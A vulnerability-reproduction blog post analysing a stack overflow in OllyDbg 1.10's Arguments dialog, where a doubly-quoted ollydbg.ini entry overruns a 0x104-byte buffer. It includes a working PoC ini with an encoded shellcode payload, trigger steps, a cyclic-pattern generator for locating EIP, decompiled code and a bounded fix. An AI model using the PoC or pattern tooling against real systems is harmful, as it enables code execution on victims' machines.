OllyDbg ollydbg.ini Buffer Overflow Reproduction

Catalpa, cyber-security enthusiast

Had some spare time, so I reproduced an old OllyDbg bug.

Vulnerability information

The vulnerability is listed in Knownsec's Seebug database:

https://www.seebug.org/vuldb/ssvid-3876

The entry is old, though, and the reference link in it is dead. A Google search turned up a related post:

http://arabteam2000-forum.com/index.php?/topic/168295-ollydbg-110-local-buffer-overflow-exploit/

The page appears to be a Middle Eastern forum; with Google Translate it is roughly readable. Fortunately the post includes a demo video and the payload, but no detailed root cause, so out of curiosity I tried to analyse the bug myself.

Reproduction

After a quick look at the video, the supplied PoC triggered the crash. The PoC is the following ollydbg.ini:

[Settings]
Check DLL versions = 0
Show toolbar =1
Status in toolbar =0
Use hardware breakpoints to step =0
Restore windows =1
Scroll MDI =0
Horizontal scroll =0
Topmost window =0
Index of default font =1
Index of default colours =0
Index of default syntax highlighting =0
Log buffer size index =0
Run trace buffer size index =1
Group adjacent commands in profile =1
Highlighted trace register =-1
IDEAL disassembling mode =0
Disassemble in lowercase =0
Separate arguments with TAB =0
Extra space between arguments =0
Show default segments =1
NEAR jump modifiers =0
Use short form of string commands =0
Use RET instead of RETN =0
Size sensitive mnemonics =1
SSE size decoding mode =0
Top of FPU stack =1
Always show memory size =1
Decode registers for any IP =0
Show symbolic addresses =1
Show local module names =1
Gray data used as filling =1
Show jump direction =1
Show jump path =0
Show jumpfrom path =0
Show path if jump is not taken =0
Underline fixups =1
Center FOLLOWed command =0
Show stack frames =1
Show local names in stack =1
Extended stack trace =0
Synchronize source with CPU =0
Include SFX extractor in code =0
SFX trace mode =0
Use real SFX entry from previous run =1
Ignore SFX exceptions =0
First pause =2
Stop on new DLL =0
Stop on DLL unload =0
Stop on new thread =0
Stop on thread end =0
Stop on debug string =0
Decode SSE registers =0
Enable last error =1
Ignore access violations in KERNEL32 =1
Ignore INT3 =0
Ignore TRAP =0
Ignore access violations =0
Step in unknown commands =0
Ignore division by 0 =0
Ignore illegal instructions =0
Ignore all FPU exceptions =0
Warn when frequent breaks =0
Warn when break not in code =1
Autoreturn =0
Save original command in trace =0
Show traced ESP =0
Show traced flags =0
Animate over system DLLs =0
Trace over string commands =0
Synchronize CPU and Run trace =0
Ignore custom exceptions =0
Smart update =1
Set high priority =1
Append arguments =1
Use ExitProcess =1
Allow injection to get WinProc =0
Sort WM_XXX by name =0
Type of last WinProc breakpoint =0
Snow-free drawing =0
Demangle symbolic names =0
Keep ordinal in name =1
Only ASCII printable in dump =0
Allow diacritical symbols =0
String decoding =3
Warn if not administrator =1
Warn when terminating process =1
Align dialogs =1
Use font of calling window =0
Specified dialog font =0
Number of lines that follow EIP =0
Restore window positions =1
Restore width of columns =0
Highlight sorted column =0
Compress analysis data =1
Backup UDD files =1
Fill rest of command with NOPs =1
Reference search mode =0
Global search =1
Aligned search =0
Allow error margin =0
Keep size of hex edit selection =1
Modify tag of FPU register =1
Hex inspector limits =1
MMX display mode =0
Last selected options card =0
Last selected appearance card =0
Ignore case in text search =1
Letter key in Disassembler =1
Looseness of code analysis =1
Decode pascal strings =1
Guess number of arguments =1
Accept far calls and returns =0
Accept direct segment modifications =0
Decode VxD calls =0
Accept privileged commands =0
Accept I/O commands =0
Accept NOPs =1
Accept shifts out of range =0
Accept superfluous prefixes =0
Accept LOCK prefixes =0
Accept unaligned stack operations =1
Accept non-standard command forms =1
Show ARG and LOCAL in procedures =0
Save analysis to file =1
Analyse main module automatically =1
Analyse code structure =1
Decode ifs as switches =0
Save trace to file =0
Trace contents of registers =1
Functions preserve registers =0
Decode tricks =0
Automatically select register type =0
Show decoded arguments =1
Show decoded arguments in stack =1
Show arguments in call stack =1
Show induced calls =1
Label display mode =0
Label includes module name =0
Highlight symbolic labels =0
Highlight RETURNs in stack =1
Ignore path in user data file =0
Ignore timestamp in user data file =1
Ignore CRC in user data file =0
Default sort mode in Names =1
Save out-of-module user data =0
Tabulate columns in log file =0
Append data to existing log file =0
Flush gathered data to log file =0
Skip spaces in source comments =1
Hide non-existing source files =0
Tab stops =8
File graph mode =2
Show internal handle names =0
Hide irrelevant handles =0


[History]
Executable[0] =C:\Users\lenovo\Desktop\baofeng.exe
View file =
View text file =
Object file =
Import library =
Log file =log.txt
Run trace file =rtrace.txt
API help file =
Text save file =
Symbolic data path =E:\my prog\Cracking Tools\odbg110
UDD path =C:\Users\lenovo\Desktop\ollydbg\ollydbg\UDD
Plugin path =C:\Users\lenovo\Desktop\ollydbg\ollydbg\plugin
Executable[1] =
Executable[2] =
Executable[3] =
Executable[4] =
Executable[5] =


[Arguments]
Executable[1] =
Executable[2] =
Executable[3] =
Executable[4] =
Executable[5] =
Executable[0] =
Argument[1] =""AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA譿AAAAAAAAAAAAAAAA?Y?桫OIIIIIIQZVTX630VX4A0B6HH0B30BCVX2BDBH4A2AD0ADTBDQB0ADAVX4Z8BDJOMNOJNFDBPB0BPKXE4N3KXNWE0JGA0ONK8OTJAKHO5BBAPKNIDKHFSKXAPPNA3BLIINJFXBLFWGPALLLM0APDLKNFOKCF5FBF0E7ENK8OUFBAPKNH6KHN0KTKXOENQA0KNKHNQK8APKNIHNUFBF0CLACBLF6K8BTB3EXBLJ7NPKXBDN0KXBGN1MJKHJVJ0KNIPKXBHBKB0BPB0KHJ6NCOUA3HOB6HUI8JOC8BLK7B5JVBOL8F0O5JVJYPOL8P0GUOOGNC6A6NVCVBPZ""
Argument[2] =sd
Argument[3] =vbn,
Argument[4] =fg
Argument[5] =sss
Argument[0] =溥嗜 琼 皂?


[Colours]
Scheme[0] =0,12,8,18,7,8,7,13
Scheme name[0] =Black on white
Scheme[1] =14,12,7,1,3,7,3,13
Scheme name[1] =Yellow on blue
Scheme[2] =1,12,3,11,14,2,7,13
Scheme name[2] =Marine
Scheme[3] =15,12,7,0,8,11,7,13
Scheme name[3] =Mostly black
Scheme[4] =0,12,8,18,7,8,7,13
Scheme name[4] =Scheme 4
Scheme[5] =14,12,7,1,3,7,3,13
Scheme name[5] =Scheme 5
Scheme[6] =1,12,3,11,14,2,7,13
Scheme name[6] =Scheme 6
Scheme[7] =15,12,7,0,8,11,7,13
Scheme name[7] =Scheme 7


[Fonts]
Font[0] =12,8,400,0,0,0,255,2,49,0
Face name[0] =Terminal
Font name[0] =OEM fixed font
Font[1] =9,6,700,0,0,0,255,0,48,1
Face name[1] =Terminal
Font name[1] =Terminal 6
Font[2] =15,8,400,0,0,0,178,2,49,0
Face name[2] =Fixedsys
Font name[2] =System fixed font
Font[3] =14,0,400,0,0,0,1,2,5,0
Face name[3] =Courier New
Font name[3] =Courier (UNICODE)
Font[4] =10,6,400,0,0,0,1,2,5,0
Face name[4] =Lucida Console
Font name[4] =Lucida (UNICODE)
Font[5] =9,6,700,0,0,0,255,0,48,0
Face name[5] =Terminal
Font name[5] =Font 5
Font[6] =15,8,400,0,0,0,178,2,49,0
Face name[6] =Fixedsys
Font name[6] =Font 6
Font[7] =14,0,400,0,0,0,1,2,5,0
Face name[7] =Courier New
Font name[7] =Font 7


[Syntax]
Commands[0] =0,0,0,0,0,0,0,0,0,0,0,0,0,0
Operands[0] =0,0,0,0,0,0,0,0,0,0,0,0,0,0
Scheme name[0] =No highlighting
Commands[1] =0,4,124,112,9,64,64,13,111,8,12,0,0,0
Operands[1] =1,0,4,13,65,1,112,6,0,0,0,0,0,0
Scheme name[1] =Christmas tree
Commands[2] =0,0,124,112,0,64,64,0,96,0,0,0,0,0
Operands[2] =0,0,0,0,0,0,0,0,0,0,0,0,0,0
Scheme name[2] =Jumps'n'calls
Commands[3] =0,0,0,0,0,0,0,0,0,0,0,0,0,0
Operands[3] =0,0,0,0,0,0,0,0,0,0,0,0,0,0
Scheme name[3] =Hilite 3
Commands[4] =0,0,0,0,0,0,0,0,0,0,0,0,0,0
Operands[4] =0,0,0,0,0,0,0,0,0,0,0,0,0,0
Scheme name[4] =Hilite 4


[Plugin Command line]
Restore command line window = 0


[Plugin Bookmarks]
Restore bookmarks window = 0


[Placement]
OllyTest =486,83,640,480,1
CPU =0,0,514,366,3
CPU subwindows =529,1198,523,1198,320,649,282,649
CPU subwindows 1=374,767,336,658,450,960,388,853
CPU subwindows 2=374,767,336,658,450,960,388,853
CPU subwindows 3=374,767,336,658,450,960,388,853
CPU subwindows 4=374,767,336,658,450,960,388,853


[Appearance]
CPU scheme =0
CPU Disassembler =1,0,0,0,0
CPU Dump =1,0,1,0,4225,0
CPU Stack =1,0,0,0
CPU Info =1,0,0,0
CPU Registers =1,0,1,0


[Columns]
CPU Disassembler =54,102,240,1536
CPU Dump =54,144,54,
CPU Stack =54,60,1536,


[Plugin IDAFicator]
PATH_RADASM = C:\Users\lenovo\Desktop\ollydbg\ollydbg\plugin\minimalist-radasm
PATH_HELP = C:\Users\lenovo\Desktop\ollydbg\ollydbg\plugin\IDAFICATOR.hlp
DIA_CUSTOMIZE_SCHEME=0,8388608,32768,8421376,128,8388736,32896,12632256,8421504,16711680,65280,16776960,255,16711935,65535,16777215,12639424,15780004,15793151,10789024
SETTINGS_MAIN=0,0,0,0,0
SETTINGS_DUMP=
SETTINGS_DISASM=0,0,0
SETTINGS_STACK=
SETTINGS_HWBP=0,0,0
SETTINGS_ROTE=
LAYOUT_ID=0
LAYOUT_SWAP_DUMP_STACK=0


[Import libraries]
Implib[0] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\MFC42.Lib
Implib[1] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\MFC42d.Lib
Implib[2] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\MFC42u.Lib
Implib[3] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\MFC42ud.Lib
Implib[4] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\mfc71.Lib
Implib[5] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\mfc71d.Lib
Implib[6] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\mfc71u.Lib
Implib[7] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\mfc71ud.Lib
Implib[8] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\mfc80d.Lib
Implib[9] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\mfc80u.Lib
Implib[10] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\mfc80ud.Lib
Implib[11] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\mfcd42d.Lib
Implib[12] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\mfcd42ud.Lib
Implib[13] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\mfcn42d.Lib
Implib[14] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\mfcn42ud.Lib
Implib[15] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\mfco42d.Lib
Implib[16] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\mfco42ud.Lib
Implib[17] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\mfcn42ud.Lib
Implib[18] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\MSVBVM50.lib
Implib[19] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\msvbvm60.lib
Implib[20] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\msvcp60.lib
Implib[21] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\msvcp71.lib
Implib[22] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\msvcp80.lib
Implib[23] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\MSVCR70.lib
Implib[24] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\msvcr71.lib
Implib[25] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\msvcr80.lib
Implib[26] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\msvcrt.lib
Implib[27] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\comctl32.lib
Implib[28] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\dbgeng.lib
Implib[29] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\dbghelp.lib
Implib[30] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\kernel32.lib
Implib[31] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\ntdll.lib
Implib[32] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\oleaut32.lib
Implib[33] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\oledlg.lib
Implib[34] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\ollydbg.lib
Implib[35] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\ws2_32.lib
Implib[36] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\wsock32.lib
[Plugin ODbgScript]
MRU1=
MRU2=
MRU3=
MRU4=
MRU5=
Restore Script window=0
Restore Script Log=0
[参数]
Argument[0]=1
[Plugin 中文搜索引擎]
Restore UStrRef Window=0

Steps to reproduce:

  1. Save the PoC as ollydbg.ini in the OllyDbg root directory (back up the original file first).
  2. Edit Executable[0] under [History] in the PoC so that it points at some exe file.
  3. Start the original OllyDbg (if you use the 吾爱破解 edition, run OllyDBG.EXE from its root directory).
  4. Open the File menu and pick the file you just entered.
  5. In the Debug menu choose Arguments, select the garbled-looking entry from the drop-down, and click OK.

At this point OllyDbg crashes: the vulnerability has been triggered.
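Instead of a run of "A"s, it helps to plant a cyclic pattern so that the bytes which end up in EIP tell you the offset of the return address directly. The program below is an added example, written for this article and not taken from the forum post or from OllyDbg: it emits the [Arguments] section for step 1 (to be merged into a copy of ollydbg.ini next to OllyDBG.EXE, keeping the [History] entry from step 2) and recovers the offset from a crash value. The key names and the double pair of quotes follow the PoC above; the "Aa0Aa1..." pattern scheme, the 0xFF0 length and the crash value 0x41366141 used in main are my own choices for illustration.

```c
/* Generate the [Arguments] section of an ollydbg.ini PoC with a cyclic
 * pattern, and map a crash EIP back to an offset inside the pattern. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Metasploit-style "Aa0Aa1Aa2..." pattern: every 4-byte window is unique
 * within the first 20280 bytes. out must have room for len + 1 bytes. */
size_t pattern_create(char *out, size_t len)
{
    size_t n = 0;
    for (char u = 'A'; u <= 'Z' && n < len; u++)
        for (char l = 'a'; l <= 'z' && n < len; l++)
            for (char d = '0'; d <= '9' && n < len; d++) {
                const char trip[3] = { u, l, d };
                for (int i = 0; i < 3 && n < len; i++)
                    out[n++] = trip[i];
            }
    out[n] = '\0';
    return n;
}

/* Offset of the four pattern bytes that landed in EIP. The value is taken
 * as the little-endian dword shown by the crash dialog or by a second
 * debugger attached to OllyDbg. Returns -1 if it is not from the pattern. */
long pattern_offset(const char *pattern, size_t len, uint32_t eip)
{
    char needle[4];
    for (int i = 0; i < 4; i++)
        needle[i] = (char)(eip >> (8 * i));
    for (size_t i = 0; i + 4 <= len; i++)
        if (memcmp(pattern + i, needle, 4) == 0)
            return (long)i;
    return -1;
}

/* Emit the [Arguments] section. The payload is wrapped in two pairs of
 * quotes: GetPrivateProfileString drops the outer pair, so the value
 * OllyDbg sees still begins with '"'. CRLF endings as in a Windows ini. */
int build_arguments_section(char *out, size_t cap, const char *payload)
{
    return snprintf(out, cap,
                    "[Arguments]\r\n"
                    "Argument[0] =\r\n"
                    "Argument[1] =\"\"%s\"\"\r\n", payload);
}

int main(void)
{
    /* 0xFF0 bytes plus four quotes stays under the 0x1000-byte read size. */
    static char pattern[0x1000], section[0x1100];
    size_t len = pattern_create(pattern, 0xFF0);

    build_arguments_section(section, sizeof section, pattern);
    fputs(section, stdout);   /* paste over [Arguments] in ollydbg.ini */

    /* Illustrative crash value 0x41366141 ("Aa6A" little-endian). */
    printf("offset of 0x41366141 in a %zu-byte pattern: %ld\n",
           len, pattern_offset(pattern, len, 0x41366141u));
    return 0;
}
```

Only alphanumerics appear in the pattern, so nothing in it upsets the ini parser or the quote handling; after the crash, feed the EIP value to pattern_offset to learn where the saved return address sits relative to the start of the argument.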

Analysis

Following the hint in the video, open the OllyDbg main executable in IDA; the vulnerable code is in sub_44150C.

The decompiled function is as follows (comments on the message and control-message constants added for readability):

INT_PTR __stdcall sub_44150C(HWND hDlg, UINT a2, WPARAM a3, LPARAM a4)
{
  signed int v4; // ebx@5
  signed int v5; // ebx@12
  signed int v6; // esi@12
  CHAR *v7; // edi@12
  CHAR *v8; // eax@14
  CHAR *v9; // edx@14
  char v10; // zf@15
  CHAR v11; // cl@17
  signed int v12; // ebx@25
  CHAR *v13; // edi@25
  const CHAR *v14; // edx@30
  INT_PTR result; // eax@4
  char v16[4096]; // [sp+0h] [bp-19204h]@28  -- directly below ReturnedString, so &v16[4096*i] == &ReturnedString[4096*(i-1)]
  const CHAR *v17; // [sp+FF0h] [bp-18214h]@26
  CHAR ReturnedString[98304]; // [sp+1000h] [bp-18204h]@6  -- 24 slots of 0x1000 bytes, one per Argument[i]
  CHAR KeyName; // [sp+19000h] [bp-204h]@6
  CHAR String; // [sp+19100h] [bp-104h]@23  -- 0x104 bytes up to the saved EBP and return address

  switch ( a2 )
  {
    case 0x110u: // WM_INITDIALOG
      SendDlgItemMessageA(hDlg, 4301, 0xCu, 0, &byte_4D5A7C);         // WM_SETTEXT
      SendDlgItemMessageA(hDlg, 4302, 0x155u, 1u, 0);                // CB_SETEXTENDEDUI
      SendDlgItemMessageA(hDlg, 4302, 0x141u, 0xFFFu, 0);            // CB_LIMITTEXT: edit box capped at 0xFFF chars
      v4 = 0;
      do
      {
        sprintf(&KeyName, aArgumentI, v4);                           // "Argument[%i]"
        GetPrivateProfileStringA(aArguments, &KeyName, &a08lx_4[5], ReturnedString, 0x1000u, FileName);
        if ( ReturnedString[0] )
          SendDlgItemMessageA(hDlg, 4302, 0x143u, 0, ReturnedString);// CB_ADDSTRING: get args from file then send them to textlist
        ++v4;
      }
      while ( v4 < 0x18 );
      SendDlgItemMessageA(hDlg, 4302, 0xCu, 0, &byte_4D5D88);        // WM_SETTEXT
      result = 1;
      break;
    case 0x111u: // WM_COMMAND
      if ( a3 == 1 )                                                 // IDOK
      {
        SendDlgItemMessageA(hDlg, 4302, 0xDu, 0x1000u, &byte_4D5D88);// WM_GETTEXT: text currently in the combo box
        if ( byte_4D5D88 )
        {
          v5 = 0;
          v6 = 0;
          v7 = ReturnedString;
          do
          {
            sprintf(&KeyName, aArgumentI, v5);
            GetPrivateProfileStringA(aArguments, &KeyName, &a08lx_4[5], &ReturnedString[4096 * v6], 0x1000u, FileName);
            if ( *v7 )
            {
              v8 = &ReturnedString[4096 * v6];
              v9 = &byte_4D5D88;
              do                                                     // inlined string compare
              {
                v10 = *v8 == *v9; // cmp arg[0] and args[current].
                if ( *v8 != *v9 )
                  break;
                if ( !*v8 )
                  goto LABEL_21;
                v11 = v8[1];
                v10 = v11 == v9[1];
                if ( v11 != v9[1] )
                  break;
                v8 += 2;
                v9 += 2;
                v10 = v11 == 0;
              }
              while ( v11 );
              if ( !v10 )                                            // stored entry differs from the current text: keep it (v6 counts kept entries)
              {
                ++v6;
                v7 += 4096;
              }
            }
LABEL_21:
            ++v5;
          }
          while ( v5 < 0x18 );
          if ( byte_4D5D88 == '"' )
          {
            sprintf(&String, aS_9, &byte_4D5D88);                    // same String buffer and format as in the loop below
            WritePrivateProfileStringA(aArguments, aArgument0, &String, FileName);
          }
          else
          {
            WritePrivateProfileStringA(aArguments, aArgument0, &byte_4D5D88, FileName);
          }
          v12 = 1;
          v13 = ReturnedString;
          do                                                         // rewrite Argument[1..23] from the kept entries
          {
            v17 = v12;
            sprintf(&KeyName, aArgumentI, v12);
            if ( v6 < v12 || *v13 != '"' )
            {
              v17 = FileName;
              if ( v6 < v12 )
                v14 = 0;                                             // NULL value: WritePrivateProfileString deletes the key
              else
                v14 = &v16[4096 * v12];                              // same slot as v13
              WritePrivateProfileStringA(aArguments, &KeyName, v14, v17);
            }
            else
            {
              sprintf(&String, aS_9, &v16[4096 * v12]);// overflow? -- up to 0xFFF chars into 0x104 bytes of stack
              WritePrivateProfileStringA(aArguments, &KeyName, &String, FileName);
            }
            ++v12;
            v13 += 4096;
          }
          while ( v12 < 24 );
        }
        EndDialog(hDlg, 0);
      }
      else if ( a3 == 2 )                                            // IDCANCEL
      {
        EndDialog(hDlg, -1);
      }
      result = 1;
      break;
    case 0x112u: // WM_SYSCOMMAND
      if ( (a3 & 0xFFF0) == 0xF060 )                                 // SC_CLOSE
        EndDialog(hDlg, -1);
      result = 0;
      break;
    default:
      result = 0;
      break;
  }
  return result;
}

Checking the cross-references shows a single caller:

INT_PTR sub_441858()
{
  return DialogBoxParamA(hInstance, aDia_arguments, hWndClient, sub_44150C, 0);
}

So sub_44150C is the dialog procedure of the Arguments dialog, handling its window messages.

The part that matters is the loop containing the vulnerable call:

do
{
  v17 = v12;
  sprintf(&KeyName, aArgumentI, v12);
  if ( v6 < v12 || *v13 != '"' )
  {
    v17 = FileName;
    if ( v6 < v12 )
      v14 = 0;
    else
      v14 = &v16[4096 * v12];
    WritePrivateProfileStringA(aArguments, &KeyName, v14, v17);
  }
  else
  {
    sprintf(&String, aS_9, &v16[4096 * v12]);// overflow?
    WritePrivateProfileStringA(aArguments, &KeyName, &String, FileName);
  }
  ++v12;
  v13 += 4096;
}
while ( v12 < 24 );

This loop starts at the second argument: v12 runs from 1 to 23 (while ( v12 < 24 ), so 23 iterations), rewriting Argument[1] through Argument[23]. v13 walks the 0x1000-byte slots in ReturnedString that hold the entries kept by the comparison loop above, and &v16[4096 * v12] is merely IDA's name for the same slot, since v16 sits 0x1000 bytes below ReturnedString.

The first if covers two cases:

  1. Kept entries remain (v12 <= v6) and the current entry does not begin with a double quote.
  2. All kept entries have been consumed (v12 > v6).

In the first case the entry's address on the stack is handed straight to WritePrivateProfileStringA and written back to the ini file. In the second case the value pointer is set to NULL, which makes WritePrivateProfileStringA delete that key instead of updating it.

So when kept entries remain and the current one does begin with a double quote, execution takes the else branch. The logic there is simple: the entry is copied with sprintf into another stack buffer (String), and that buffer is written back to the ini file.

Why is a leading double quote treated specially? The MSDN page for GetPrivateProfileString says:

If the string associated with lpKeyName is enclosed in single or double quotation marks, the marks are discarded when the GetPrivateProfileString function retrieves the string.

In other words, if a value is enclosed in single or double quotes, the enclosing quotes are silently dropped on read. The sprintf presumably re-wraps such a value in quotes (the format string aS_9) before writing it back, so that the quotes survive the next read.

My guess is that the author treated a value beginning with a double quote as the empty-argument case, i.e. "", and therefore did not bound its length any further. But a user can put a malformed value into the ini, such as ""xxxx"" with two pairs of quotes: the API strips the outer pair, the inner pair remains, the value is not empty, and execution still reaches the sprintf.

IDA shows String at bp-0x104, so only 0x104 bytes separate it from the saved frame pointer and the return address, while a stored argument can be up to 0xFFF bytes long (the 0x1000 read size). The unbounded sprintf therefore overruns the stack frame.
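To make the length argument concrete, the following C program is an added model of this code path; it is my own code, not OllyDbg's, and is written to build without Win32 so that it runs anywhere. It implements a minimal [section] key=value lookup with the quote stripping documented for GetPrivateProfileString, applies the *v13 == '"' test, computes how many bytes the sprintf would push into String, and shows a bounded replacement for that branch. Assumptions: aS_9 is "\"%s\"" (the code only re-quotes values that already start with a quote), String holds 0x100 bytes, and the whitespace handling of the profile API is approximated rather than reproduced byte for byte. The ini text is constructed inline and mirrors the PoC: a benign Argument[0] and a 0x300-byte Argument[1] wrapped in two pairs of quotes.

```c
/* Portable model of the Arguments-dialog write-back path (no Win32 needed). */
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define STRING_BUF 0x100   /* String: bp-0x104, KeyName starts at bp-0x204 */
#define ARG_BUF    0x1000  /* nSize passed to GetPrivateProfileStringA */

/* One matching pair of outer ' or " is dropped, as MSDN documents for
 * GetPrivateProfileString; the result is truncated to cap like nSize. */
static size_t profile_unquote(const char *raw, size_t rawlen, char *out, size_t cap)
{
    if (rawlen >= 2 && (raw[0] == '"' || raw[0] == '\'') && raw[rawlen - 1] == raw[0]) {
        raw++;
        rawlen -= 2;
    }
    if (rawlen > cap - 1)
        rawlen = cap - 1;
    memcpy(out, raw, rawlen);
    out[rawlen] = '\0';
    return rawlen;
}

/* Minimal [section] key=value lookup over an in-memory ini text. Trailing
 * spaces after the key and leading spaces before the value are ignored
 * (assumption: an approximation of the Win32 profile API, not a clone). */
static bool profile_get(const char *ini, const char *section, const char *key,
                        char *out, size_t cap)
{
    size_t seclen = strlen(section), keylen = strlen(key);
    bool in_section = false;
    const char *line = ini;

    while (*line) {
        const char *eol = strpbrk(line, "\r\n");
        size_t len = eol ? (size_t)(eol - line) : strlen(line);

        if (len > 0 && line[0] == '[') {
            in_section = len == seclen + 2 && line[len - 1] == ']' &&
                         memcmp(line + 1, section, seclen) == 0;
        } else if (in_section) {
            const char *eq = memchr(line, '=', len);
            if (eq) {
                size_t klen = (size_t)(eq - line);
                while (klen > 0 && line[klen - 1] == ' ')
                    klen--;
                if (klen == keylen && memcmp(line, key, keylen) == 0) {
                    const char *val = eq + 1, *end = line + len;
                    while (val < end && *val == ' ')
                        val++;
                    profile_unquote(val, (size_t)(end - val), out, cap);
                    return true;
                }
            }
        }
        if (!eol)
            break;
        line = eol + strspn(eol, "\r\n");
    }
    out[0] = '\0';
    return false;
}

typedef struct {
    bool   quoted_path;  /* else branch taken: *v13 == '"' */
    size_t bytes;        /* bytes the sprintf writes into String, NUL included */
    long   overflow;     /* bytes beyond STRING_BUF; <= 0 means it fits */
} arg_check;

/* What the vulnerable else branch does with one stored entry, assuming
 * aS_9 == "\"%s\"" (two extra quote characters plus the terminator). */
static arg_check check_argument(const char *arg)
{
    arg_check c = { arg[0] == '"', 0, 0 };
    if (c.quoted_path) {
        c.bytes = strlen(arg) + 2 + 1;
        c.overflow = (long)c.bytes - STRING_BUF;
    }
    return c;
}

/* Bounded replacement for that branch: refuses instead of truncating, so a
 * too-long value is never silently rewritten either. */
static bool safe_requote(const char *arg, char *dst, size_t cap)
{
    int n = snprintf(dst, cap, "\"%s\"", arg);
    if (n < 0 || (size_t)n >= cap) {
        dst[0] = '\0';
        return false;
    }
    return true;
}

/* Constructed sample ini mirroring the PoC layout (not the real file). */
static void build_sample_ini(char *buf, size_t cap)
{
    char filler[0x301];
    memset(filler, 'A', 0x300);
    filler[0x300] = '\0';
    snprintf(buf, cap,
             "[Settings]\r\nShow toolbar =1\r\n\r\n[Arguments]\r\n"
             "Argument[0] =\"hello world\"\r\n"
             "Argument[1] =\"\"%s\"\"\r\n", filler);
}

static arg_check check_sample_argument(int index)
{
    char ini[0x800], key[32], arg[ARG_BUF];
    build_sample_ini(ini, sizeof ini);
    snprintf(key, sizeof key, "Argument[%d]", index);
    profile_get(ini, "Arguments", key, arg, sizeof arg);
    return check_argument(arg);
}

int main(void)
{
    for (int i = 0; i < 2; i++) {
        arg_check c = check_sample_argument(i);
        printf("Argument[%d]: quoted path=%d, sprintf bytes=%zu, overflow=%ld\n",
               i, c.quoted_path, c.bytes, c.overflow);
    }
    return 0;
}
```

Argument[0] loses its quotes on read and takes the plain write-back path; Argument[1] keeps its inner pair, still begins with a quote, and the re-quoting sprintf would write 0x305 bytes into a 0x100-byte buffer, 0x205 bytes past its end. The same check in safe_requote rejects that value outright.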

The forum's PoC works on Windows XP; readers who are interested can try building a PoC for Windows 7, Windows 10 and so on.

Check whether DEP is enabled on the target. On Windows 7 it is on by default only for essential Windows programs and services (the OptIn policy), so third-party processes such as OllyDbg are not covered unless they opt in. You can see this in Task Manager (enable the Data Execution Prevention column) or query it programmatically with GetProcessDEPPolicy.

Even though third-party programs are not covered, the shellcode may still touch some kernel data or perform other operations. I am not very familiar with Windows exploitation and have not written a working PoC for those systems yet.

The 吾爱破解 (52pojie) edition of OllyDbg has the same problem; essentially every build based on OllyDbg 1.10 is affected. The PoC for the Chinese edition is as follows:

[History]
UDD path=C:\Users\lenovo\Desktop\吾爱破解专用版Ollydbg\吾爱破解专用版Ollydbg\UDD
Plugin path=C:\Users\lenovo\Desktop\吾爱破解专用版Ollydbg\吾爱破解专用版Ollydbg\plugin
View file=
View text file=
Object file=
Import library=
Log file=
Run trace file=rtrace.txt
API help file=
Text save file=
Symbolic data path=
Executable[1]=C:\Users\lenovo\Desktop\吾爱破解专用版Ollydbg\吾爱破解专用版Ollydbg\OllyDBG.EXE
Executable[2]=C:\Users\lenovo\Desktop\吾爱破解专用版Ollydbg\吾爱破解专用版Ollydbg\吾爱破解[LCG].exe
Executable[3]=C:\Users\lenovo\Desktop\1.exe
Executable[4]=C:\Users\lenovo\Desktop\reverse2_final.exe
Executable[5]=C:\Users\lenovo\Desktop\packed.exe
Executable[0]=C:\Users\lenovo\Desktop\ollydbg\ollydbg\OllyDBG.EXE
[Settings]
Check DLL versions=0
Show toolbar=1
Status in toolbar=1
Use hardware breakpoints to step=1
Restore windows=2193
Scroll MDI=0
Horizontal scroll=0
Topmost window=0
Index of default font=1
Index of default colours=0
Index of default syntax highlighting=0
Log buffer size index=0
Run trace buffer size index=1
Group adjacent commands in profile=1
Highlighted trace register=-1
IDEAL disassembling mode=0
Disassemble in lowercase=1
Separate arguments with TAB=0
